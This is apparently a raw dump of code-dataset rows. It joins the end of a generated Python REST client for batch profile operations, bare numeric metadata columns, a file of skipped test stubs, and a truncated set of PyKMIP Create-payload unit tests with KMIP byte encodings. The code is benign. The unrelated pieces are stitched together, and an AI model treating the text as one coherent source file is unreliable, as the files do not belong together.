        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Snapshot the local namespace, then fold kwargs into it while
        # rejecting anything that is not a declared parameter.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method v2_batch_departments_multiple_retrieve_profiles" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'department_ids' is set
        if ('department_ids' not in params or
                params['department_ids'] is None):
            raise ValueError("Missing the required parameter `department_ids` when calling `v2_batch_departments_multiple_retrieve_profiles`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'department_ids' in params:
            query_params.append(('department_ids', params['department_ids']))  # noqa: E501
        if 'recursive' in params:
            query_params.append(('recursive', params['recursive']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/batch/departments/profiles/', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[Profile]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def v2_batch_profiles_delete(self, body, **kwargs):  # noqa: E501
        """v2_batch_profiles_delete  # noqa: E501

        Batch-delete profiles.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_profiles_delete(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param list[UpdateProfile] body: (required)
        :return: Empty
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Public wrapper around the _with_http_info twin; returns data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.v2_batch_profiles_delete_with_http_info(body, **kwargs)  # noqa: E501
        else:
            (data) = self.v2_batch_profiles_delete_with_http_info(body, **kwargs)  # noqa: E501
            return data

    def v2_batch_profiles_delete_with_http_info(self, body, **kwargs):  # noqa: E501
        """v2_batch_profiles_delete  # noqa: E501

        Batch-delete profiles.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_profiles_delete_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param list[UpdateProfile] body: (required)
        :return: Empty
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fold kwargs into the local-namespace snapshot, rejecting unknowns.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method v2_batch_profiles_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `v2_batch_profiles_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/batch/profiles/', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Empty',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def v2_batch_profiles_partial_update(self, body, **kwargs):  # noqa: E501
        """v2_batch_profiles_partial_update  # noqa: E501

        Batch-update profiles.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_profiles_partial_update(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param list[UpdateProfile] body: (required)
        :return: list[Profile]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Public wrapper around the _with_http_info twin; returns data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.v2_batch_profiles_partial_update_with_http_info(body, **kwargs)  # noqa: E501
        else:
            (data) = self.v2_batch_profiles_partial_update_with_http_info(body, **kwargs)  # noqa: E501
            return data

    def v2_batch_profiles_partial_update_with_http_info(self, body, **kwargs):  # noqa: E501
        """v2_batch_profiles_partial_update  # noqa: E501

        Batch-update profiles.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_profiles_partial_update_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param list[UpdateProfile] body: (required)
        :return: list[Profile]
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fold kwargs into the local-namespace snapshot, rejecting unknowns.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method v2_batch_profiles_partial_update" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `v2_batch_profiles_partial_update`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/batch/profiles/', 'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[Profile]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def v2_batch_profiles_read(self, **kwargs):  # noqa: E501
        """v2_batch_profiles_read  # noqa: E501

        Batch-fetch profiles.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_profiles_read(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[Profile]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Public wrapper around the _with_http_info twin; returns data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.v2_batch_profiles_read_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.v2_batch_profiles_read_with_http_info(**kwargs)  # noqa: E501
            return data

    def v2_batch_profiles_read_with_http_info(self, **kwargs):  # noqa: E501
        """v2_batch_profiles_read  # noqa: E501

        Batch-fetch profiles.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.v2_batch_profiles_read_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[Profile]
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fold kwargs into the local-namespace snapshot, rejecting unknowns.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method v2_batch_profiles_read" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/v2/batch/profiles/', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[Profile]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 37.404306
| 156
| 0.614775
| 1,784
| 15,635
| 5.091368
| 0.093049
| 0.051084
| 0.052846
| 0.031708
| 0.935484
| 0.921832
| 0.915887
| 0.894088
| 0.875372
| 0.865463
| 0
| 0.020353
| 0.296067
| 15,635
| 417
| 157
| 37.494005
| 0.804925
| 0.316214
| 0
| 0.775229
| 1
| 0
| 0.177087
| 0.061198
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041284
| false
| 0
| 0.018349
| 0
| 0.119266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e61c4459cfe0fdfe7f52be822844f6a533a766b8
| 436
|
py
|
Python
|
tests/unit/test_utils.py
|
cschreep/dug
|
f61f0248caa8a5b6b4f25f6d1a8f8f1afd28a39e
|
[
"MIT"
] | null | null | null |
tests/unit/test_utils.py
|
cschreep/dug
|
f61f0248caa8a5b6b4f25f6d1a8f8f1afd28a39e
|
[
"MIT"
] | null | null | null |
tests/unit/test_utils.py
|
cschreep/dug
|
f61f0248caa8a5b6b4f25f6d1a8f8f1afd28a39e
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.mark.skip("Implement this test")
def test_object_factory():
    """Placeholder for the ``object_factory`` unit test."""


@pytest.mark.skip("Implement this test")
def test_complex_handler():
    """Placeholder for the ``complex_handler`` unit test."""


@pytest.mark.skip("Implement this test")
def test_get_dbgap_var_link():
    """Placeholder for the ``get_dbgap_var_link`` unit test."""


@pytest.mark.skip("Implement this test")
def test_get_dbgap_study_link():
    """Placeholder for the ``get_dbgap_study_link`` unit test."""


@pytest.mark.skip("Implement this test")
def test_parse_study_name_from_filename():
    """Placeholder for the ``parse_study_name_from_filename`` unit test."""
| 16.148148
| 42
| 0.743119
| 64
| 436
| 4.796875
| 0.34375
| 0.162866
| 0.228013
| 0.374593
| 0.749186
| 0.749186
| 0.749186
| 0.749186
| 0.625407
| 0.488599
| 0
| 0
| 0.142202
| 436
| 26
| 43
| 16.769231
| 0.820856
| 0
| 0
| 0.625
| 0
| 0
| 0.21789
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3125
| true
| 0.3125
| 0.0625
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e62044bbd93dfa9af9265d845ec02b7a2ce22502
| 70,924
|
py
|
Python
|
kmip/tests/unit/core/messages/payloads/test_create.py
|
ondrap/PyKMIP
|
c8ea17d8faf827e0f9d004972835128a1a71569f
|
[
"Apache-2.0"
] | 179
|
2015-03-20T06:08:59.000Z
|
2022-03-14T02:24:38.000Z
|
kmip/tests/unit/core/messages/payloads/test_create.py
|
imharshr/PyKMIP
|
9403ff3d2aa83de4c786b8eedeb85d169fd4a594
|
[
"Apache-2.0"
] | 600
|
2015-04-08T14:14:48.000Z
|
2022-03-28T13:49:47.000Z
|
kmip/tests/unit/core/messages/payloads/test_create.py
|
imharshr/PyKMIP
|
9403ff3d2aa83de4c786b8eedeb85d169fd4a594
|
[
"Apache-2.0"
] | 131
|
2015-03-30T12:51:49.000Z
|
2022-03-23T04:34:34.000Z
|
# Copyright (c) 2014 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from kmip.core import enums
from kmip.core import exceptions
from kmip.core import objects
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages import payloads
class TestCreateRequestPayload(testtools.TestCase):
    def setUp(self):
        """Build the KMIP encodings shared by the tests in this case."""
        super(TestCreateRequestPayload, self).setUp()

        # Encoding obtained from the KMIP 1.1 testing document,
        # Section 3.1.1.
        #
        # This encoding matches the following set of values:
        # Request Payload
        #     Object Type - Symmetric Key
        #     Template Attribute
        #         Attribute
        #             Attribute Name - Cryptographic Algorithm
        #             Attribute Value - AES
        #         Attribute
        #             Attribute Name - Cryptographic Length
        #             Attribute Value - 128
        #         Attribute
        #             Attribute Name - Cryptographic Usage Mask
        #             Attribute Value - Encrypt | Decrypt
        self.full_encoding = utils.BytearrayStream(
            b'\x42\x00\x79\x01\x00\x00\x00\xC0'
            b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
            b'\x42\x00\x91\x01\x00\x00\x00\xA8'
            b'\x42\x00\x08\x01\x00\x00\x00\x30'
            b'\x42\x00\x0A\x07\x00\x00\x00\x17'
            b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x41\x6C'
            b'\x67\x6F\x72\x69\x74\x68\x6D\x00'
            b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
            b'\x42\x00\x08\x01\x00\x00\x00\x30'
            b'\x42\x00\x0A\x07\x00\x00\x00\x14'
            b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x4C\x65'
            b'\x6E\x67\x74\x68\x00\x00\x00\x00'
            b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00'
            b'\x42\x00\x08\x01\x00\x00\x00\x30'
            b'\x42\x00\x0A\x07\x00\x00\x00\x18'
            b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x55\x73'
            b'\x61\x67\x65\x20\x4D\x61\x73\x6B'
            b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x0C\x00\x00\x00\x00'
        )

        # Encoding obtained from the KMIP 1.1 testing document,
        # Section 3.1.1, and manually converted into KMIP 2.0 format.
        #
        # This encoding matches the following set of values:
        # Request Payload
        #     Object Type - Symmetric Key
        #     Attributes
        #         Cryptographic Algorithm - AES
        #         Cryptographic Length - 128
        #         Cryptographic Usage Mask - Encrypt | Decrypt
        #     Protection Storage Masks
        #         Protection Storage Mask - Software | Hardware
        self.full_encoding_with_attributes = utils.BytearrayStream(
            b'\x42\x00\x79\x01\x00\x00\x00\x60'
            b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
            b'\x42\x01\x25\x01\x00\x00\x00\x30'
            b'\x42\x00\x28\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
            b'\x42\x00\x2A\x02\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00'
            b'\x42\x00\x2C\x02\x00\x00\x00\x04\x00\x00\x00\x0C\x00\x00\x00\x00'
            b'\x42\x01\x5F\x01\x00\x00\x00\x10'
            b'\x42\x01\x5E\x02\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
        )

        # Encoding obtained from the KMIP 1.1 testing document,
        # Section 3.1.1.
        #
        # This encoding matches the full encoding above minus the leading
        # Object Type field:
        # Request Payload
        #     Template Attribute
        #         Attribute
        #             Attribute Name - Cryptographic Algorithm
        #             Attribute Value - AES
        #         Attribute
        #             Attribute Name - Cryptographic Length
        #             Attribute Value - 128
        #         Attribute
        #             Attribute Name - Cryptographic Usage Mask
        #             Attribute Value - Encrypt | Decrypt
        self.no_object_type_encoding = utils.BytearrayStream(
            b'\x42\x00\x79\x01\x00\x00\x00\xB0'
            b'\x42\x00\x91\x01\x00\x00\x00\xA8'
            b'\x42\x00\x08\x01\x00\x00\x00\x30'
            b'\x42\x00\x0A\x07\x00\x00\x00\x17'
            b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x41\x6C'
            b'\x67\x6F\x72\x69\x74\x68\x6D\x00'
            b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
            b'\x42\x00\x08\x01\x00\x00\x00\x30'
            b'\x42\x00\x0A\x07\x00\x00\x00\x14'
            b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x4C\x65'
            b'\x6E\x67\x74\x68\x00\x00\x00\x00'
            b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00'
            b'\x42\x00\x08\x01\x00\x00\x00\x30'
            b'\x42\x00\x0A\x07\x00\x00\x00\x18'
            b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x55\x73'
            b'\x61\x67\x65\x20\x4D\x61\x73\x6B'
            b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x0C\x00\x00\x00\x00'
        )

        # Encoding obtained from the KMIP 1.1 testing document,
        # Section 3.1.1.
        #
        # This encoding matches the following set of values:
        # Request Payload
        #     Object Type - Symmetric Key
        self.no_template_attribute_encoding = utils.BytearrayStream(
            b'\x42\x00\x79\x01\x00\x00\x00\x10'
            b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
        )
    def tearDown(self):
        """Tear down the test case; no cleanup beyond the base class."""
        super(TestCreateRequestPayload, self).tearDown()
def test_invalid_object_type(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the object type of a Create request payload.
"""
kwargs = {'object_type': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
payloads.CreateRequestPayload,
**kwargs
)
args = (
payloads.CreateRequestPayload(),
'object_type',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
setattr,
*args
)
def test_invalid_template_attribute(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the template attribute of a Create request payload.
"""
kwargs = {'template_attribute': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
payloads.CreateRequestPayload,
**kwargs
)
args = (
payloads.CreateRequestPayload(),
'template_attribute',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
setattr,
*args
)
def test_invalid_protection_storage_masks(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the protection storage masks of a Create request payload.
"""
kwargs = {"protection_storage_masks": "invalid"}
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure.",
payloads.CreateRequestPayload,
**kwargs
)
kwargs = {
"protection_storage_masks": objects.ProtectionStorageMasks(
tag=enums.Tags.COMMON_PROTECTION_STORAGE_MASKS
)
}
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure with a ProtectionStorageMasks tag.",
payloads.CreateRequestPayload,
**kwargs
)
args = (
payloads.CreateRequestPayload(),
"protection_storage_masks",
"invalid"
)
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure.",
setattr,
*args
)
args = (
payloads.CreateRequestPayload(),
"protection_storage_masks",
objects.ProtectionStorageMasks(
tag=enums.Tags.COMMON_PROTECTION_STORAGE_MASKS
)
)
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure with a ProtectionStorageMasks tag.",
setattr,
*args
)
    def test_read(self):
        """
        Test that a Create request payload can be read from a data stream.
        """
        payload = payloads.CreateRequestPayload()

        # A freshly constructed payload carries no state.
        self.assertIsNone(payload.object_type)
        self.assertIsNone(payload.template_attribute)
        self.assertIsNone(payload.protection_storage_masks)

        payload.read(self.full_encoding)

        self.assertEqual(
            enums.ObjectType.SYMMETRIC_KEY,
            payload.object_type
        )
        # The decoded template attribute must match the fixture exactly:
        # AES / 128-bit / Encrypt | Decrypt.
        self.assertEqual(
            objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Algorithm'
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.CryptographicAlgorithm,
                            value=enums.CryptographicAlgorithm.AES,
                            tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Length'
                        ),
                        attribute_value=primitives.Integer(
                            value=128,
                            tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Usage Mask'
                        ),
                        attribute_value=primitives.Integer(
                            value=(
                                enums.CryptographicUsageMask.ENCRYPT.value |
                                enums.CryptographicUsageMask.DECRYPT.value
                            ),
                            tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
                        )
                    )
                ]
            ),
            payload.template_attribute
        )
        # The KMIP 1.x fixture carries no protection storage masks.
        self.assertIsNone(payload.protection_storage_masks)
    def test_read_kmip_2_0(self):
        """
        Test that a Create request payload can be read from a data stream
        encoded with the KMIP 2.0 format.
        """
        payload = payloads.CreateRequestPayload()
        # A freshly constructed payload has no fields set.
        self.assertIsNone(payload.object_type)
        self.assertIsNone(payload.template_attribute)
        self.assertIsNone(payload.protection_storage_masks)
        payload.read(
            self.full_encoding_with_attributes,
            kmip_version=enums.KMIPVersion.KMIP_2_0
        )
        self.assertEqual(
            enums.ObjectType.SYMMETRIC_KEY,
            payload.object_type
        )
        self.assertEqual(
            objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Algorithm'
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.CryptographicAlgorithm,
                            value=enums.CryptographicAlgorithm.AES,
                            tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Length'
                        ),
                        attribute_value=primitives.Integer(
                            value=128,
                            tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Usage Mask'
                        ),
                        attribute_value=primitives.Integer(
                            value=(
                                enums.CryptographicUsageMask.ENCRYPT.value |
                                enums.CryptographicUsageMask.DECRYPT.value
                            ),
                            tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
                        )
                    )
                ]
            ),
            payload.template_attribute
        )
        # The KMIP 2.0 encoding also carries protection storage masks
        # (3 == SOFTWARE | HARDWARE, per the matching write test).
        self.assertEqual(
            objects.ProtectionStorageMasks(protection_storage_masks=[3]),
            payload.protection_storage_masks
        )
def test_read_missing_object_type(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create request payload when the object type is missing from the
encoding.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
args = (self.no_object_type_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create request payload encoding is missing the object type.",
payload.read,
*args
)
def test_read_missing_template_attribute(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create request payload when the template attribute is missing
from the encoding.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
args = (self.no_template_attribute_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create request payload encoding is missing the template "
"attribute.",
payload.read,
*args
)
def test_read_missing_attributes(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create request payload when the attributes structure is missing
from the encoding.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
args = (self.no_template_attribute_encoding, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_2_0}
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create request payload encoding is missing the attributes "
"structure.",
payload.read,
*args,
**kwargs
)
    def test_write(self):
        """
        Test that a Create request payload can be written to a data stream.
        """
        payload = payloads.CreateRequestPayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Algorithm'
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.CryptographicAlgorithm,
                            value=enums.CryptographicAlgorithm.AES,
                            tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Length'
                        ),
                        attribute_value=primitives.Integer(
                            value=128,
                            tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Usage Mask'
                        ),
                        attribute_value=primitives.Integer(
                            value=(
                                enums.CryptographicUsageMask.ENCRYPT.value |
                                enums.CryptographicUsageMask.DECRYPT.value
                            ),
                            tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
                        )
                    )
                ]
            )
        )
        stream = utils.BytearrayStream()
        payload.write(stream)
        # The serialized stream should match the static test encoding byte
        # for byte.
        self.assertEqual(len(self.full_encoding), len(stream))
        self.assertEqual(str(self.full_encoding), str(stream))
    def test_write_kmip_2_0(self):
        """
        Test that a Create request payload can be written to a data stream
        encoded with the KMIP 2.0 format.
        """
        payload = payloads.CreateRequestPayload(
            object_type=enums.ObjectType.SYMMETRIC_KEY,
            template_attribute=objects.TemplateAttribute(
                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Algorithm'
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.CryptographicAlgorithm,
                            value=enums.CryptographicAlgorithm.AES,
                            tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Length'
                        ),
                        attribute_value=primitives.Integer(
                            value=128,
                            tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
                        )
                    ),
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            'Cryptographic Usage Mask'
                        ),
                        attribute_value=primitives.Integer(
                            value=(
                                enums.CryptographicUsageMask.ENCRYPT.value |
                                enums.CryptographicUsageMask.DECRYPT.value
                            ),
                            tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
                        )
                    )
                ]
            ),
            # Protection storage masks are only serialized for KMIP 2.0.
            protection_storage_masks=objects.ProtectionStorageMasks(
                protection_storage_masks=[
                    (
                        enums.ProtectionStorageMask.SOFTWARE.value |
                        enums.ProtectionStorageMask.HARDWARE.value
                    )
                ]
            )
        )
        stream = utils.BytearrayStream()
        payload.write(stream, kmip_version=enums.KMIPVersion.KMIP_2_0)
        # The serialized stream should match the static KMIP 2.0 test
        # encoding byte for byte.
        self.assertEqual(len(self.full_encoding_with_attributes), len(stream))
        self.assertEqual(str(self.full_encoding_with_attributes), str(stream))
def test_write_missing_object_type(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create request payload when the payload is missing the object type.
"""
payload = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
)
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create request payload is missing the object type field.",
payload.write,
*args
)
def test_write_missing_template_attribute(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create request payload when the payload is missing the template
attribute.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create request payload is missing the template attribute "
